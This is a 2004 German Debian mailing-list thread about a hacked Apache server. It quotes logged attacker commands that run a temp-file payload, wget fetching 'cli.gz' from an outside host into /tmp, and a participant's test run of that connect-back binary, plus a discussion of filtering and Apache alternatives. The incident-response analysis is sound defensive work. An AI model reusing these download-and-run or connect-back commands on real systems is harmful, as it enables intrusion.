Re: Apache macht komische Dinge
Hi, ich hab das gleiche Problem (und auf debian-security geposted). Gibt's schon hier schon Empfehlungen / Lösungswege? Viele Grüße und Danke Timo
Re: Apache macht komische Dinge
Hallo, Am Montag, den 23.08.2004, 22:10 +0200 schrieb Michelle Konzack: Habe gerade ein 'mozilla http://xpire.info/' gemacht und 403 bekommen. Ein 'telnet xpire.info 80' mit einem GET / ist schon interessanter... Kann ich bestätigen - aber kann mir jemand erklären, wo da der Unterschied ist? Jeweils 403 bei: lwp-download http://xpire.info/; lynx -source xpire.info curl http://xpire.info/; Wieso geht dann ein GET / ? Ich hätte Stein und Bein geschworen, daß der Browser auch nix anderes macht... Gruß, Ratti -- -o) fontlinge | Fontmanagement for Linux | Schriftenverwaltung in Linux /\\ http://freshmeat.net/projects/fontlinge/ _\_V http://www.gesindel.de https://sourceforge.net/projects/fontlinge/ signature.asc Description: Dies ist ein digital signierter Nachrichtenteil
Re: Apache macht komische Dinge
Hallo Joerg, hallo Liste, * Joerg Rossdeutscher wrote on Wed, 25 Aug 2004 at 21:16 +0200: Jeweils 403 bei: lwp-download http://xpire.info/; lynx -source xpire.info curl http://xpire.info/; Wieso geht dann ein GET / ? Ich hätte Stein und Bein geschworen, daß der Browser auch nix anderes macht... Ja, aber der sendet einen User-Agent Header. Danach kann man filtern, und somit jeglichen Browser aussperren. Viele Grüße, -Dirk -- Linux: Who needs Windows and Gates in a world without walls and fences? pgpROrg0in4KP.pgp Description: PGP signature
Re: Apache macht komische Dinge
Hi Dirk Pirschel, *, Dirk Pirschel wrote on Wed Aug 25, 2004 at 11:06:38PM +0200: Ja, aber der sendet einen User-Agent Header. Danach kann man filtern, und somit jeglichen Browser aussperren. Ich hatte weder mit wget noch mit mozilla(firefox|1.7.2|1.8a3) Probleme die Datei runterzuladen... Vielleicht wird nach Provider oder aehnlichem gefiltert ... was allerdings nicht erklaert warum GET funktionierte. -- so long, Rainer Bendig aka mindz PGP/GPG key (ID: 0xCC7EA575) http://DigitallyImpressed.com Get it from wwwkeys.de.pgp.net for contacting me take a look on http://digitallyimpressed.com/contact -- Don't reply to this e-mail address and please don't cc to me on lists. If we meet on a list, you can be sure that i am already on the list. -- We really don't have any enemies. It's just that some of our best friends are trying to kill us. -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Apache-Alternativen (was: Apache macht komische Dinge)
Hallo, welche Alternativen hat man, wenn einem der Indianer etwas zu viele Möglichkeiten bietet? Kann man das, was der Indianer in einem Programm macht, auf mehrere einzelne, spezialisierte Programme übertragen und wenn ja auf welche? Ein # apt-cache search httpd zeigt zwar einige alternative Server, boa - Lightweight and High Performance WebServer caudium - An extensible WWW server written in Pike cern-httpd - The CERN HTTP (World-Wide Web) server dhttpd - Minimal secure webserver. No cgi-bin support! roxen - The Roxen Challenger Webserver roxen2 - The Roxen Challenger Webserver thttpd - tiny/turbo/throttling HTTP server thttpd-util - Support utilities for thttpd wn - Secure and efficient http server with advanced features. ich habe allerdings noch keine Übersicht gefunden, mit der man die Leistungsfähigkeit der einzelnen Produkte vergleichen kann. Gruß Uli -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache-Alternativen (was: Apache macht komische Dinge)
Am 2004-08-24 08:16:15, schrieb Ulrich Mietke: Hallo, welche Alternativen hat man, wenn einem der Indianer etwas zu viele Möglichkeiten bietet? Kann man das, was der Indianer in einem Programm Erst mal mußt Du rausfinden, ob es der Indianer war, der den Hacker hereingelassen hat... Hast Du PHP installiert ? Bei schlechter Programmierung kanste Dir selber Deine Backdoos bauen macht, auf mehrere einzelne, spezialisierte Programme übertragen und wenn ja auf welche? Was willst Du ?` ich habe allerdings noch keine Übersicht gefunden, mit der man die Leistungsfähigkeit der einzelnen Produkte vergleichen kann. Apache ist der leistungsfähigste und stabilste... Gruß Uli Greetings Michelle -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ Michelle Konzack Apt. 917 ICQ #328449886 50, rue de Soultz MSM LinuxMichi 0033/3/8845235667100 Strasbourg/France IRC #Debian (irc.icq.com) signature.pgp Description: Digital signature
Apache macht komische Dinge
Hallo Liste, kann mir hier jemand auf die Sprünge helfen, bzw. weiterführende Links nennen was ich mir da eingefangen habe? System ist ein Debian-Woody mit aktuellen Security-Patches. Heute abend fiel mir das in 'top' auf: 20788 www-data 18 0 488 460 428 R51.6 0.1 0:01 exe 20787 www-data 14 0 488 460 428 R46.8 0.1 0:05 exe 'ps aux' lieferte das hier: www-data 20769 47.7 0.1 1480 460 ?R19:36 0:06 sh -c /tmp/dsadas;rm -f /tmp/dsadas www-data 20783 45.1 0.1 1480 460 ?R19:36 0:02 sh -c /tmp/dsadas;rm -f /tmp/dsadas Diese beiden Prozesse ließen sich auch durch das Beenden von 'apache' und 'apache-ssl' nicht beirren, ich habe sie dann von Hand durch ein 'kill' beendet. /var/log/apache/error.log gibt folgendes her: [Sat Aug 21 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) /tmp/dsadas: No such file or directory exe: no process killed dsadas: no process killed /tmp/dsadas: no process killed exe: no process killed dsadas: no process killed /tmp/dsadas: no process killed /tmp/dsadas: No such file or directory [Sun Aug 22 06:25:16 2004] [notice] SIGUSR1 received. Doing graceful restart und heute: [Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory --18:06:28-- http://xpire.info/cli.gz = `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .. 100% 20.04 KB/s 18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147] ls: /usr/bin/X11/X: No such file or directory --18:06:33-- http://xpire.info/cli.gz = `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .. 100% 14.68 KB/s 18:06:35 (14.68 KB/s) - `/tmp/a.out' saved [19147/19147] ls: /usr/bin/X11/X: No such file or directory ls: /usr/bin/X11/X: No such file or directory [Mon Aug 23 19:33:56 2004] [notice] caught SIGTERM, shutting down Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Einträge dieser Art feststellen. [Thu Aug 12 09:42:00 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument [Thu Aug 12 13:59:22 2004] [notice] caught SIGTERM, shutting down Das Einzige was ich mit google gefunden habe ist 'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze für einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch Reste in '/tmp' und einen Prozess 'pra' auf einem tcp-Port. Das hatte ich definitiv _nicht_. Weder einen zusätzlichen Port offen, noch _irgendwas_ außer bekanntem in '/tmp'. Any Hints? PS: Nein, Sven. Nicht momo. gruss f -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache macht komische Dinge
Hallo Frank, Am 2004-08-23 20:25:16, schrieb Frank Lorenzen: Hallo Liste, kann mir hier jemand auf die Sprünge helfen, bzw. weiterführende Links nennen was ich mir da eingefangen habe? System ist ein Debian-Woody mit aktuellen Security-Patches. und heute: [Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem) ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory --18:06:28-- http://xpire.info/cli.gz = `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .. 100% 20.04 KB/s Du bist gehackt... Schau Dir mal die cli.gz in einem Editor an... (Es ist keine gnuzipdatei) Mach das scheiß teil auf alle Fälle nicht executable... Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Einträge dieser Art feststellen. Das Einzige was ich mit google gefunden habe ist 'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze für einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch Reste in '/tmp' und einen Prozess 'pra' auf einem tcp-Port. Das hatte ich definitiv _nicht_. Weder einen zusätzlichen Port offen, noch _irgendwas_ außer bekanntem in '/tmp'. Vesuche den Sch... gerade zu disassembieren... Habe allerdings ein kleines Problem mit meiner amd64 Installation und dem chroot... Any Hints? PS: Nein, Sven. Nicht momo. gruss f Greetings Michelle -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ Michelle Konzack Apt. 917 ICQ #328449886 50, rue de Soultz MSM LinuxMichi 0033/3/8845235667100 Strasbourg/France IRC #Debian (irc.icq.com) signature.pgp Description: Digital signature
Re: Apache macht komische Dinge
On Mon, Aug 23, 2004 at 08:53:56PM +0200, Michelle Konzack wrote: Hallo Frank, Am 2004-08-23 20:25:16, schrieb Frank Lorenzen: [...] ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory sh: option `-c' requires an argument ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory ls: /usr/include/sdk386: No such file or directory ls: /usr/bin/X11/X: No such file or directory --18:06:28-- http://xpire.info/cli.gz = `/tmp/a.out' Resolving xpire.info... done. Connecting to xpire.info[202.99.23.162]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 19,147 [text/plain] 0K .. 100% 20.04 KB/s Du bist gehackt... Das ist ja sehr schön daß mir das nach 7 Jahren Linux auch mal passiert. Bisher hatte ich dieses Vergnügen noch nicht. Darauf trink ich ein 'Tannenzäpfle'. Trotzdem würde mich interessieren wie das zustande kam, denn eine lang bekannte Sache kann das Ding ja wohl nicht sein sonst hätte das Debian-Security-Team wohl in irgendeiner Weise reagiert. Schau Dir mal die cli.gz in einem Editor an... (Es ist keine gnuzipdatei) Mach das scheiß teil auf alle Fälle nicht executable... Ich habe es mir zuhause heruntergeladen und mal mit file/ldd/strings schnell drübergeschaut aber noch keine ernsthaften Versuche unternommen zu sehen was es tut. Wie gesagt, auf dem System das die Symptome zeigt war nichts zu finden. Ich bin fast dabei zu glauben daß der Hack aus irgendeinem Grunde schief ging. Ich habe als temporären milchmädchen-Würgaround mal ausgehende Verbindungen zu xpire.info gedropt. Da 'cli.gz' ja mehrmals heruntergeladen wurde, mit jeweils unterschiedlicher Dateigröße, gehe ich davon aus, daß an dem 'Tool' noch herumgeschraubt wird. Somit währe zumindest für Stümper die aktualisierung unterbunden solange nicht der Download-Server gewechselt wird. Lieber währe mir allerdings ein apache der sich nicht dazu überreden läßt Kommandos auszuführen. Erstmalig aufgetreten ist das am 12.08. Vorher konnte ich keine Einträge dieser Art feststellen. Das Einzige was ich mit google gefunden habe ist 'http://www.imperialviolet.org/'. Die Jungs dort halten das ganze für einen Hack der anderer Leute Leitungen floodet, hatten allerdings auch Reste in '/tmp' und einen Prozess 'pra' auf einem tcp-Port. Das hatte ich definitiv _nicht_. Weder einen zusätzlichen Port offen, noch _irgendwas_ außer bekanntem in '/tmp'. Vesuche den Sch... gerade zu disassembieren... Habe allerdings ein kleines Problem mit meiner amd64 Installation und dem chroot... Any Hints? PS: Nein, Sven. Nicht momo. gruss f Greetings Michelle gruss f -- Haeufig gestellte Fragen und Antworten (FAQ): http://www.de.debian.org/debian-user-german-FAQ/ Zum AUSTRAGEN schicken Sie eine Mail an [EMAIL PROTECTED] mit dem Subject unsubscribe. Probleme? Mail an [EMAIL PROTECTED] (engl)
Re: Apache macht komische Dinge
Am 2004-08-23 21:32:38, schrieb Frank Lorenzen: On Mon, Aug 23, 2004 at 08:53:56PM +0200, Michelle Konzack wrote: Du bist gehackt... Das ist ja sehr schön daß mir das nach 7 Jahren Linux auch mal passiert. Bisher hatte ich dieses Vergnügen noch nicht. Darauf trink ich ein 'Tannenzäpfle'. Was steht denn in Deiner apache-LOG ? Der Typ hat es ja fertig gebracht, Deinen Server zu veranlassen, die cli.gz herunterzuladen... Habe gerade ein 'mozilla http://xpire.info/' gemacht und 403 bekommen. Ein 'telnet xpire.info 80' mit einem GET / ist schon interessanter... Habe mir die Tracefile im mozilla angesehen und bin auf einem Chinesischem EDU-Server gelandet... Trotzdem würde mich interessieren wie das zustande kam, denn eine lang bekannte Sache kann das Ding ja wohl nicht sein sonst hätte das Debian-Security-Team wohl in irgendeiner Weise reagiert. Setz mal nen Bugreport auf apache... Schau Dir mal die cli.gz in einem Editor an... (Es ist keine gnuzipdatei) Mach das scheiß teil auf alle Fälle nicht executable... Ich habe es mir zuhause heruntergeladen und mal mit file/ldd/strings schnell drübergeschaut aber noch keine ernsthaften Versuche unternommen zu sehen was es tut. cli.gz host port ist der Aufruf... Das sieht nach einem modufiziertem telnet-Client aus Auf 'nem Testrechner: ( -c './cli.gz xpire.info 80' ) _ / | Looking up xpire.info...OK | Connect Back | \__ Wie gesagt, auf dem System das die Symptome zeigt war nichts zu finden. Ich bin fast dabei zu glauben daß der Hack aus irgendeinem Grunde schief ging. Der will ja nen X-Server haben... Ich habe als temporären milchmädchen-Würgaround mal ausgehende Verbindungen zu xpire.info gedropt. Da 'cli.gz' ja mehrmals Das ist OK heruntergeladen wurde, mit jeweils unterschiedlicher Dateigröße, gehe ich davon aus, daß an dem 'Tool' noch herumgeschraubt wird. Somit währe zumindest für Stümper die aktualisierung unterbunden solange nicht der Download-Server gewechselt wird. Lieber währe mir allerdings ein apache der sich nicht dazu überreden läßt Kommandos auszuführen. Schick nen Bugreport an die apache-Leute gruss f Greetings Michelle -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ Michelle Konzack Apt. 917 ICQ #328449886 50, rue de Soultz MSM LinuxMichi 0033/3/8845235667100 Strasbourg/France IRC #Debian (irc.icq.com) signature.pgp Description: Digital signature
